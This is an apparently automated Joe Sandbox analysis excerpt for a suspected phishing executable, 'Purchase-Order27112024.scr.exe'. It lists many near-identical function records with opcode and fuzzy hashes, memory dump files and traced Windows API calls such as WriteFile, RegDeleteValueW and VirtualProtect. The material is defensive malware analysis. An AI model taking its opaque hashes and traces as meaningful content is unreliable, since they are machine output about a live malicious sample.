                                                                                                      • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                                                                      • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                                                                      • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                                                                      • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                                                                      • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                                                                      • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                      • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 539440098-0
                                                                                                      • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                                                                      • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                                                                      • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                                                                      • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumErrorLastWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 14984897-0
                                                                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                      • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                                                                      • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                      • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,000000F8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 849931509-0
                                                                                                      • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                                                                      • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                                                                      • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                                                                      • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1136574915-0
                                                                                                      • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                      • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                                                                      • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                      • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00405BB8
                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesCreate
                                                                                                      • String ID:
                                                                                                      • API String ID: 415043291-0
                                                                                                      • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                      • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                      • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                      • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointerwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 327478801-0
                                                                                                      • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                                                                      • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                                                                      • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                                                                      • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                                                                      APIs
                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 390214022-0
                                                                                                      • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                      • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                      • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                      • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                      APIs
                                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PathSearch
                                                                                                      • String ID:
                                                                                                      • API String ID: 2203818243-0
                                                                                                      • Opcode ID: 617a12e61fb4324aa246364927c77d6377e7495a27636ef24a8cd76bd72a4227
                                                                                                      • Instruction ID: b3e0bc928fe15a286efade0c4fd5f6c5c16538b609349815db9c46a815cf95c6
                                                                                                      • Opcode Fuzzy Hash: 617a12e61fb4324aa246364927c77d6377e7495a27636ef24a8cd76bd72a4227
                                                                                                      • Instruction Fuzzy Hash: 09E04FB2314200AAD710DFA5DE48EEA77ACDB0036CF30467AE611A61D0E2B49A41973D
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                      • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                                                                      • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                      • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
